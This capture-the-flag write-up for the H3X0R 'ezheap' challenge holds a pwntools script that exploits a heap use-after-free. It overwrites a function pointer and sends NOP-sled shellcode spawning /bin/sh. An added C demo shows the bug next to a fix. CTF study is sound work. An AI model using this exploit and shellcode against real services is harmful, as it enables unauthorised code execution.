H3X0R CTF ezheap
CTF | 2017. 1. 8. 02:28


Once the chunk is freed, the next allocation lands on top of the object that holds the function pointer. So write shellcode with a NOP sled into the existing heap chunk, point the function pointer at the sled, and get the program to call it.


from pwn import *

# Challenge server from the writeup; the commented-out line was the local test box.
p = remote("52.199.49.117", 10003)
# p = remote("10.211.55.3", 11111)

# The service prints a heap address first ("0x" + 7 hex digits on 32-bit = 9 chars).
leak = int(p.recv(9), 16)
log.info("heap leak: " + hex(leak))

# Menu 1: allocate a chunk.
print(p.recvuntil(b">>>"))
p.sendline(b"1")
# Menu 3: write data into it.
print(p.recvuntil(b">>>"))
p.sendline(b"3")
p.sendline(b"AAAA")

# Menu 4: free the chunk; answer "Exit?" with 0 to stay in the menu.
# The freed chunk is recycled for the object that holds the function pointer.
print(p.recvuntil(b">>>"))
p.sendline(b"4")
print(p.recvuntil(b"Exit?"))
p.sendline(b"0")

# Menu 3 again: this write now lands on the recycled chunk, i.e. on the function pointer.
print(p.recvuntil(b">>>"))
p.sendline(b"3")

# Payload: function pointer -> inside the NOP sled that follows it in this same buffer
# (the leak is taken to be this buffer's address), then the NOP sled, then
# 32-bit execve("/bin//sh") followed by exit(1).
payload = p32(leak + 12)
payload += b"\x90" * 16
payload += (b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"   # xor eax,eax; push eax; push "//sh"; push "/bin"
            b"\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80"               # mov ebx,esp; ecx=edx=0; al=0xb; int 0x80
            b"\x31\xc0\x40\xcd\x80")                                  # xor eax,eax; inc eax; int 0x80
p.sendline(payload)

# Once the service calls the overwritten function pointer, the shell drops here.
p.interactive()
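The bug class behind the one-line summary, as an added C example that is not part of the original writeup and not the challenge binary's code. The struct layout (function pointer first, data after it), the "user buffer" allocation and the benign target function standing in for shellcode are assumptions made for illustration; the chunk-reuse check relies on glibc's behaviour of handing back the just-freed chunk for a same-sized malloc. The vulnerable function shows the freed object's chunk being recycled for attacker-controlled data that overlaps the function pointer, exactly the p32(...) + NOPs + shellcode shape of the exploit; the fixed variant shows the minimal mitigation of clearing the pointer on free and checking it before the call.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed layout: a heap object whose first field is a function pointer,
 * followed by some data, so a same-sized attacker buffer overlaps the pointer. */
struct callback_obj {
    int (*handler)(void);
    char note[24];
};

static int benign_handler(void) { return 0; }

/* Stands in for the shellcode: where control ends up after the hijack. */
static int attacker_target(void) { return 0x1337; }

/* Vulnerable flow: free the object, let a same-sized "user data" allocation
 * reuse the chunk, fill it with an attacker-chosen pointer plus filler, then
 * call through the stale object pointer. */
int demo_uaf(void)
{
    struct callback_obj *obj = malloc(sizeof *obj);
    if (!obj)
        return -1;
    obj->handler = benign_handler;
    free(obj);                                     /* obj now dangles */

    unsigned char *user_buf = malloc(sizeof *obj); /* same size class as obj */
    if (!user_buf)
        return -1;
    if ((void *)user_buf != (void *)obj) {         /* allocator did not recycle the chunk */
        free(user_buf);
        return -2;
    }

    uintptr_t target = (uintptr_t)attacker_target;
    memcpy(user_buf, &target, sizeof target);      /* overwrites obj->handler */
    memset(user_buf + sizeof target, 0x90, sizeof *obj - sizeof target); /* "NOP sled" filler */

    int result = obj->handler();                   /* use-after-free: runs attacker_target */
    free(user_buf);
    return result;
}

/* Fixed flow: the pointer is cleared at free time and checked before use,
 * so the recycled chunk can no longer be reached through it. */
int demo_fixed(void)
{
    struct callback_obj *obj = malloc(sizeof(struct callback_obj));
    if (!obj)
        return -1;
    obj->handler = benign_handler;
    free(obj);
    obj = NULL;                                    /* no stale reference survives */

    unsigned char *user_buf = malloc(sizeof(struct callback_obj));
    if (!user_buf)
        return -1;
    uintptr_t target = (uintptr_t)attacker_target;
    memcpy(user_buf, &target, sizeof target);      /* same attacker data lands in the chunk */
    memset(user_buf + sizeof target, 0x90, sizeof(struct callback_obj) - sizeof target);

    int result = obj ? obj->handler() : -3;        /* guarded: the call never happens */
    free(user_buf);
    return result;
}

int main(void)
{
    printf("vulnerable: handler returned 0x%x\n", demo_uaf());
    printf("fixed:      handler returned %d\n", demo_fixed());
    return 0;
}
```

Compile with plain gcc and run it; under AddressSanitizer the vulnerable path is reported as a heap-use-after-free instead of silently returning 0x1337, which is the detection you want in a test build.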

